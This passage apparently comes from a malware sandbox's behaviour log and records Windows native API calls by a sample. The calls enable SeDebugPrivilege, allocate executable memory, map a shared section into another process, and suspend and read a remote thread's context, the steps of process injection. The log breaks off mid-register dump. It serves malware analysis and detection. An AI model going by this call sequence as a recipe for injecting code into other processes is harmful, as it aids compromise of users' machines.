= 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000fe0000" filename = "" Region: id = 989 start_va = 0x23e0000 end_va = 0x240efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000023e0000" filename = "" Region: id = 991 start_va = 0x1f0000 end_va = 0x1f5fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Thread: id = 8 os_tid = 0x84 [0118.258] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x19f23c | out: HeapArray=0x19f23c*=0x500000) returned 0x1 [0118.267] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Windows\\SYSTEM32\\ntdll.dll", NtPathName=0x19f1ec, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Windows\\SYSTEM32\\ntdll.dll", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0118.270] NtCreateFile (in: FileHandle=0x19f20c, DesiredAccess=0x120089, ObjectAttributes=0x19f1d4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19f1f4, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19f20c*=0x6c, IoStatusBlock=0x19f1f4*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0118.280] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x502770) returned 1 [0118.301] NtQueryInformationFile (in: FileHandle=0x6c, IoStatusBlock=0x19f1f4, FileInformation=0x19f14c, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x19f1f4, FileInformation=0x19f14c) returned 0x0 [0118.311] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1788a0) returned 0x6c6020 [0118.383] NtReadFile (in: FileHandle=0x6c, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x19f1f4, Buffer=0x6c6020, BufferLength=0x1784a0, ByteOffset=0x19f164*=0, Key=0x0 | out: IoStatusBlock=0x19f1f4, Buffer=0x6c6020*) returned 0x0 [0118.386] NtClose (Handle=0x6c) returned 0x0 [0118.386] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x17b001) returned 0x840020 [0118.556] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x6c6020) returned 1 [0118.577] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19f1e0*=0x0, ZeroBits=0x0, RegionSize=0x19f1e4*=0x2f9522, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x19f1e0*=0x9c0000, RegionSize=0x19f1e4*=0x2fa000) returned 0x0 [0118.677] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1000) returned 0x503380 [0118.678] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1000) returned 0x504388 [0118.679] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1000) returned 0x505390 [0118.679] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x2000) returned 0x506398 [0118.680] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x505390) returned 1 [0118.680] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x3000) returned 0x5083a0 [0118.681] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x506398) returned 1 [0118.681] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x4000) returned 0x50b3a8 [0118.682] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x5083a0) returned 1 [0118.682] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x5000) returned 0x505390 [0118.682] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x50b3a8) returned 1 [0118.682] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1000) returned 0x50a398 [0118.683] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x2000) returned 0x50b3a0 [0118.683] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x50a398) returned 1 [0118.683] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x3000) returned 0x50d3a8 [0118.684] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x50b3a0) returned 1 [0118.684] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x4000) returned 0x5103b0 [0118.685] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x50d3a8) returned 1 [0118.685] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x5000) returned 0x50a398 [0118.686] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x5103b0) returned 1 [0118.686] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1000) returned 0x50f3a0 [0118.686] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x2000) returned 0x5103a8 [0118.686] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x50f3a0) returned 1 [0118.686] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x3000) returned 0x5123b0 [0118.687] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x5103a8) returned 1 [0119.054] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x4000) returned 0x5153b8 [0119.055] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x5123b0) returned 1 [0119.056] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x5000) returned 0x50f3a0 [0119.056] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x5153b8) returned 1 [0119.058] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x503380) returned 1 [0119.058] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x504388) returned 1 [0119.059] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x505390) returned 1 [0119.060] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x50a398) returned 1 [0119.061] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x50f3a0) returned 1 [0119.173] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1000) returned 0x503380 [0119.173] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1000) returned 0x504388 [0119.173] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1000) returned 0x505390 [0119.173] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x2000) returned 0x506398 [0119.173] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x505390) returned 1 [0119.175] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x3000) returned 0x5083a0 [0119.177] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x506398) returned 1 [0119.177] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x4000) returned 0x50b3a8 [0119.178] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x5083a0) returned 1 [0119.182] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x5000) returned 0x505390 [0119.183] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x50b3a8) returned 1 [0119.184] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1000) returned 0x50a398 [0119.184] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x2000) returned 0x50b3a0 [0119.185] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x50a398) returned 1 [0119.185] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x3000) returned 0x50d3a8 [0119.186] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x50b3a0) returned 1 [0119.186] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x4000) returned 0x5103b0 [0119.187] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x50d3a8) returned 1 [0119.187] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x5000) returned 0x50a398 [0119.187] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x5103b0) returned 1 [0119.188] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1000) returned 0x50f3a0 [0119.188] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x2000) returned 0x5103a8 [0119.188] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x50f3a0) returned 1 [0119.188] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x3000) returned 0x5123b0 [0119.189] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x5103a8) returned 1 [0119.189] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x4000) returned 0x5153b8 [0119.189] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x5123b0) returned 1 [0119.189] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x5000) returned 0x50f3a0 [0119.190] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x5153b8) returned 1 [0119.190] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x503380) returned 1 [0119.191] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x504388) returned 1 [0119.191] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x505390) returned 1 [0119.192] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x50a398) returned 1 [0119.193] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x50f3a0) returned 1 [0119.193] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Windows\\SYSTEM32\\ntdll.dll", NtPathName=0x19f18c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Windows\\SYSTEM32\\ntdll.dll", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0119.193] NtCreateFile (in: FileHandle=0x19f1ac, DesiredAccess=0x120089, ObjectAttributes=0x19f174*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19f194, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19f1ac*=0x6c, IoStatusBlock=0x19f194*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0119.194] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x502770) returned 1 [0119.194] NtQueryInformationFile (in: FileHandle=0x6c, IoStatusBlock=0x19f194, FileInformation=0x19ef08, Length=0x208, FileInformationClass=0x9 | out: IoStatusBlock=0x19f194, FileInformation=0x19ef08) returned 0x0 [0119.194] NtClose (Handle=0x6c) returned 0x0 [0119.194] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x208) returned 0x503380 [0119.195] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x503380) returned 1 [0119.201] NtQueryVirtualMemory (in: ProcessHandle=0xffffffff, Address=0x63a311d0, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x19f1c8, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x19f1c8*(BaseAddress=0x63a31000, AllocationBase=0x63a30000, AllocationProtect=0x80, RegionSize=0x2000, State=0x1000, Protect=0x20, Type=0x1000000), ResultLength=0x0) returned 0x0 [0119.994] NtQuerySystemInformation (in: SystemInformationClass=0x23, SystemInformation=0x19f220, Length=0x2, ResultLength=0x0 | out: SystemInformation=0x19f220, ResultLength=0x0) returned 0x0 [0120.015] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x7, ProcessInformation=0x19f244, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0x19f244, ReturnLength=0x0) returned 0x0 [0120.048] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x840020) returned 1 [0120.075] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19eed4*=0x0, ZeroBits=0x0, RegionSize=0x19eed8*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19eed4*=0x20000, RegionSize=0x19eed8*=0x10000) returned 0x0 [0120.080] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x20000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x20000, ResultLength=0x0) returned 0xc0000004 [0120.091] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f234*=0x20000, RegionSize=0x19eef8, FreeType=0x8000) returned 0x0 [0120.091] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19eec0*=0x0, ZeroBits=0x0, RegionSize=0x19eec4*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19eec0*=0x20000, RegionSize=0x19eec4*=0x20000) returned 0x0 [0120.091] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x20000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x20000, ResultLength=0x0) returned 0x0 [0120.145] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f234*=0x20000, RegionSize=0x19f238, FreeType=0x8000) returned 0x0 [0120.172] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="USERNAME", Value=0x19eff0 | out: Value="RDhJ0CNFevzX") returned 0x0 [0120.172] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="advapi32.dll", BaseAddress=0x19f060 | out: BaseAddress=0x19f060*=0x74810000) returned 0x0 [0120.247] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x19f24c | out: TokenHandle=0x19f24c*=0x80) returned 0x0 [0120.253] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x19f240 | out: lpLuid=0x19f240*(LowPart=0x14, HighPart=0)) returned 1 [0120.266] NtAdjustPrivilegesToken (in: TokenHandle=0x80, DisableAllPrivileges=0, NewState=0x19f23c, BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 0x0 [0120.325] NtClose (Handle=0x80) returned 0x0 [0120.327] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="USERNAME", Value=0x19e818 | out: Value="RDhJ0CNFevzX") returned 0x0 [0120.341] RtlSetEnvironmentVariable (in: Environment=0x0, Name="6NON26-3", Value="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\pkypr.exe" | out: Environment=0x0) returned 0x0 [0120.344] NtCreateSection (in: SectionHandle=0x19ed18, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x19eab8, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x19ed18*=0x80) returned 0x0 [0120.348] NtMapViewOfSection (in: SectionHandle=0x80, ProcessHandle=0xffffffff, BaseAddress=0x19ed1c*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19eab8*=0x2e200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x19ed1c*=0x430000, SectionOffset=0x0, ViewSize=0x19eab8*=0x2f000) returned 0x0 [0120.359] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19e420*=0x0, ZeroBits=0x0, RegionSize=0x19e424*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19e420*=0x30000, RegionSize=0x19e424*=0x10000) returned 0x0 [0120.359] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x30000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x30000, ResultLength=0x0) returned 0xc0000004 [0120.362] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19eaac*=0x30000, RegionSize=0x19e444, FreeType=0x8000) returned 0x0 [0120.362] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19e40c*=0x0, ZeroBits=0x0, RegionSize=0x19e410*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19e40c*=0x4b0000, RegionSize=0x19e410*=0x20000) returned 0x0 [0120.362] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4b0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4b0000, ResultLength=0x0) returned 0x0 [0120.387] NtOpenProcess (in: ProcessHandle=0x19ea74, DesiredAccess=0x438, ObjectAttributes=0x19ea94*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0x19ea68*(UniqueProcess=0x78c, UniqueThread=0x0) | out: ProcessHandle=0x19ea74*=0xbc) returned 0x0 [0120.387] NtQueryInformationProcess (in: ProcessHandle=0xbc, ProcessInformationClass=0x1a, ProcessInformation=0x19e780, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0x19e780, ReturnLength=0x0) returned 0x0 [0120.387] NtCreateSection (in: SectionHandle=0x19e41c, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x19e3dc, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x19e41c*=0xc0) returned 0x0 [0120.387] NtMapViewOfSection (in: SectionHandle=0xc0, ProcessHandle=0xffffffff, BaseAddress=0x19e424*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19e3dc*=0xbe200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x19e424*=0x8c0000, SectionOffset=0x0, ViewSize=0x19e3dc*=0xbf000) returned 0x0 [0120.393] NtMapViewOfSection (in: SectionHandle=0xc0, ProcessHandle=0xbc, BaseAddress=0x19e420*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19e418*=0xbe200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x19e420*=0x4e60000, SectionOffset=0x0, ViewSize=0x19e418*=0xbf000) returned 0x0 [0124.265] NtClose (Handle=0xc0) returned 0x0 [0124.273] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x2000) returned 0x50a820 [0124.274] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x19e0e8 | out: TokenHandle=0x19e0e8*=0xc0) returned 0x0 [0124.278] NtQueryInformationToken (in: TokenHandle=0xc0, TokenInformationClass=0x1, TokenInformation=0x19d8e0, TokenInformationLength=0x400, ReturnLength=0x19e0e0 | out: TokenInformation=0x19d8e0, ReturnLength=0x19e0e0) returned 0x0 [0124.280] ConvertSidToStringSidW (in: Sid=0x19d8e8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)), StringSid=0x19e0e4 | out: StringSid=0x19e0e4*="S-1-5-21-1560258661-3990802383-1811730007-1000") returned 1 [0124.280] NtClose (Handle=0xc0) returned 0x0 [0124.280] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19e358*=0x0, ZeroBits=0x0, RegionSize=0x19e35c*=0x13fc6, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x19e358*=0x4d0000, RegionSize=0x19e35c*=0x14000) returned 0x0 [0124.280] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19e344*=0x0, ZeroBits=0x0, RegionSize=0x19e348*=0x13fc6, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x19e344*=0x980000, RegionSize=0x19e348*=0x14000) returned 0x0 [0124.290] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19e358*=0x41f226, NumberOfBytesToProtect=0x19e35c, NewAccessProtection=0x40, OldAccessProtection=0x19e3a4 | out: BaseAddress=0x19e358*=0x41f000, NumberOfBytesToProtect=0x19e35c, OldAccessProtection=0x19e3a4*=0x40) returned 0x0 [0124.291] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x50a820) returned 1 [0124.336] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Windows\\SYSTEM32\\ntdll.dll", NtPathName=0x19e150, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Windows\\SYSTEM32\\ntdll.dll", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0124.338] NtCreateFile (in: FileHandle=0x19e170, DesiredAccess=0x120089, ObjectAttributes=0x19e138*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Windows\\SYSTEM32\\ntdll.dll", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e158, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e170*=0xc0, IoStatusBlock=0x19e158*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0124.338] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x506528) returned 1 [0124.350] NtQueryInformationFile (in: FileHandle=0xc0, IoStatusBlock=0x19e158, FileInformation=0x19decc, Length=0x208, FileInformationClass=0x9 | out: IoStatusBlock=0x19e158, FileInformation=0x19decc) returned 0x0 [0124.350] NtClose (Handle=0xc0) returned 0x0 [0124.351] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x208) returned 0x5005c8 [0124.351] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x5005c8) returned 1 [0124.510] NtOpenProcess (in: ProcessHandle=0x19e358, DesiredAccess=0x438, ObjectAttributes=0x19d908*(Length=0x30, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0x19d948*(UniqueProcess=0x78c, UniqueThread=0x0) | out: ProcessHandle=0x19e358*=0xc0) returned 0x0 [0124.517] NtQueryInformationProcess (in: ProcessHandle=0xc0, ProcessInformationClass=0x0, ProcessInformation=0x19d958, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x19d958, ReturnLength=0x0) returned 0x0 [0124.530] NtOpenThread (in: ThreadHandle=0x19d900, DesiredAccess=0x1a, ObjectAttributes=0x19d908, ClientId=0x19d938*(UniqueProcess=0x0, UniqueThread=0x790) | out: ThreadHandle=0x19d900*=0xc4) returned 0x0 [0124.544] NtSuspendThread (in: ThreadHandle=0xc4, PreviousSuspendCount=0x0 | out: PreviousSuspendCount=0x0) returned 0x0 [0124.554] NtGetContextThread (in: ThreadHandle=0xc4, Context=0x19de50 | out: Context=0x19de50*(ContextFlags=0x0, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x10000b, FloatSave.DataSelector=0x1fa0, FloatSave.RegisterArea=([0]=0x33, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x2b, [11]=0x0, [12]=0x46, [13]=0x2, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x70, [65]=0xe3, [66]=0x33, [67]=0xb5, [68]=0xff, [69]=0xf, [70]=0x0, [71]=0x0, [72]=0x10, [73]=0xb4, [74]=0xb, [75]=0xa, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x55555555, SegGs=0x55555555, SegFs=0x6641a0, SegEs=0x0, SegDs=0xcfa98, Edi=0x0, Esi=0xcfb10, Ebx=0x0, Edx=0x0, Ecx=0x0, Eax=0xffffffff, Ebp=0x0, Eip=0xcf648, SegCs=0x0, EFlags=0xffffffff, Esp=0xffffffff, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x46, [5]=0x2, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0xe8, [21]=0xa7, [22]=0xf7, [23]=0xa9, [24]=0xfd, [25]=0x7f, [26]=0x0, [27]=0x0, [28]=0x70, [29]=0x18, [30]=0x66, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0xa0, [37]=0xda, [38]=0x8d, [39]=0xa9, [40]=0xfd, [41]=0x7f, [42]=0x0, [43]=0x0, [44]=0x34, [45]=0x20, [46]=0xed, [47]=0xa8, [48]=0xfd, [49]=0x7f, [50]=0x0, [51]=0x0, [52]=0x7f, [53]=0x2, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0xa0, [77]=0x1f, [78]=0x0, [79]=0x0, [80]=0xff, [81]=0xff, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, 